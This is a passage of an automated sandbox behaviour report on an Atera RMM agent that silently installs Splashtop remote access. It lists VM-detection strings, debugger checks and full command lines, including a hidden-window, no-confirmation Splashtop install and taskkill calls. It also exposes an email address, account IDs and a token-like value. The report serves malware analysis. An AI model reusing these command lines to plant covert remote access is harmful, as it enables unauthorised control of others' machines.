                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597438
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597327
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596437
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596328
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596219
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595871
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599778
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599653
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\lib\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\node_modules\async\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\File\node_modules\request\node_modules\form-data\
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service0
                                Source: svchost.exe, 00000023.00000003.2381617121.00000157530EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceSynchronizes the system time of this virtual machine with the system time of the physical computer.Hyper-V Time Synchronization ServicevmictimesyncStopped
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2200469566.000002E967D45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSFT_PhysicalDisk{1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\SPACES_PhysicalDisk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}"6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk6000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E5980000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2282825260.0000020AB9C28000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2281496750.0000020AB9B20000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2977989591.0000016BEA6C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001B.00000002.2200050264.000002E967D1A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: svchost.exe, 00000023.00000002.2932960901.00000157530BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.FriendlyName("VMware Virtual disk");
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.
                                Source: svchost.exe, 00000023.00000003.2381617121.00000157530EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicheartbeatvmicheartbeatStopped;l^5Hy
                                Source: AgentPackageAgentInformation.exe, 00000014.00000000.1924528514.000001BE62232000.00000002.00000001.01000000.00000016.sdmpBinary or memory string: VIRUSfighterAVMware Carbon Black Cloud Sensor7VMware Carbon Black Defense/VMware Carbon Black EDR9VMware Carbon Black Response
                                Source: svchost.exe, 00000023.00000003.2103876055.000001575321A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1A
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                                Source: svchost.exe, 00000023.00000002.2932377741.0000015753040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JSetPropValue.Manufacturer("VMware");
                                Source: AteraAgent.exe, 00000018.00000002.2974355709.0000016BEA2CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.windowsupdate.commsdownloadupdatev3statictrustedrendisallowedcertstl.cabSg
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197809436.000002E967BFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeata
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface0
                                Source: svchost.exe, 00000023.00000002.2931955081.0000015753013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMware20,1NoneVMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f09
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197776980.000002E967BF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Provides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197809436.000002E967BFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdownv
                                Source: svchost.exe, 00000023.00000002.2932960901.00000157530BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@friendlyname"vmware virtual disk"OCALE
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197776980.000002E967BF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197707990.000002E967BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicshutdown"
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                                Source: svchost.exe, 00000023.00000002.2932377741.0000015753040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dSetPropValue.FriendlyName("VMware Virtual disk");
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicvssvmicvssStopped1w
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service0
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E591E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`X
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197776980.000002E967BF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V host to interact with specific services running inside the virtual machine.Hyper-V Guest Service InterfacevmicguestinterfaceStoppedervi
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides an interface for the Hyper-V hypervisor to provide per-partition performance counters to the host operating system.HV Host ServiceHvHostStoppedl
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service0
                                Source: AteraAgent.exe, 00000018.00000002.2972325371.0000016BE9E74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ervicevmickvpexchangeHyper-V Heartbeat ServicevmicheartbeatH
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2196113251.000002E967B72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServicevmicshutdownvmicshutdownStoppedkv
                                Source: svchost.exe, 00000023.00000002.2935041284.00000157530D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,@friendlyname"vmware virtual disk"
                                Source: rundll32.exe, 00000004.00000002.1731816789.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1841969761.0000000002936000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1956064131.000001BE7B4B8000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2671597333.0000021732780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a platform for communication between the virtual machine and the operating system running on the physical computer.Hyper-V Remote Desktop Virtualization ServicevmicrdvStopped
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                                Source: svchost.exe, 00000023.00000002.2931955081.0000015753013000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 006000C2942FCE4D06663969F532E45D1AName
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Hyper-V PowerShell Direct ServicevmicvmsessionStopped
                                Source: AteraAgent.exe, 0000000D.00000002.2279102001.0000020AB9720000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                                Source: svchost.exe, 00000023.00000002.2932687276.00000157530A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk#
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197886676.000002E967C0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service0
                                Source: AteraAgent.exe, 0000000D.00000002.2270306119.0000020AA1017000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service0
                                Source: svchost.exe, 00000023.00000003.2381617121.00000157530EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SPACES_PhysicalDisk{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PD:{fadc7a83-6534-864a-66c8-a75a642cb79f}6000C2942FCE4D06663969F532E45D1AVMware Virtual diskVMwareVirtual disk6000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2179995487.000002E94EB24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_ServiceProvides a mechanism to exchange data between the virtual machine and the operating system running on the physical computer.Hyper-V Data Exchange ServicevmickvpexchangeStopped
                                Source: AteraAgent.exe, 0000000C.00000002.1790492966.000001C5E58A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%\System32\fveui.dll,-844works\AteraAgent\AteraAgent.exe
                                Source: AgentPackageAgentInformation.exe, 0000001B.00000002.2197707990.000002E967BDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_Service.Name="vmicvss"L
                                Source: C:\Windows\Temp\SplashtopStreamer.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
                                Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00414B86 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00414B86
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004292D0 _memset,_vswprintf_s,GetLastError,GetCurrentProcessId,OutputDebugStringW,36_2_004292D0
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004214F2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,36_2_004214F2
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD2064 mov ecx, dword ptr fs:[00000030h]37_2_00BD2064
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BD8A75 mov eax, dword ptr fs:[00000030h]37_2_00BD8A75
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00425244 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,36_2_00425244
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess token adjusted: Debug
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0041FAA3 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0041FAA3
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00417EFF SetUnhandledExceptionFilter,36_2_00417EFF
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00412FD0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_00412FD0
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC8AD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00BC8AD2
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC153F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,37_2_00BC153F
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC16CC SetUnhandledExceptionFilter,37_2_00BC16CC
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC0F8B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,37_2_00BC0F8B
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279DDCD4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_00007FF6279DDCD4
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279E07D8 SetUnhandledExceptionFilter,40_2_00007FF6279E07D8
                                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.119.152.241 443
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, explorer.exe37_2_00BB6949
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: C:\Windows\Temp\unpack\PreVerCheck.exe "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="000111.financeiro@yamahaconcessionaria.com.br" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000llkxmiab" /agentid="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/production 443 or8ixli90mf "identified" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/production 443 or8ixli90mf "generalinfo fromgui" 001q300000llkxmiab
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackagestremote\agentpackagestremote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/production 443 or8ixli90mf "install eyjsbw1db2rlijoiafpdrezqaes3nw1kin0=" 001q300000llkxmiab
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BC116F cpuid 37_2_00BC116F
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: __snwprintf_s,GetLocaleInfoW,PathFindFileNameW,_memset,GetModuleHandleW,GetProcAddress,LoadLibraryExW,36_2_004076AA
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: GetLocaleInfoA,36_2_00424CFE
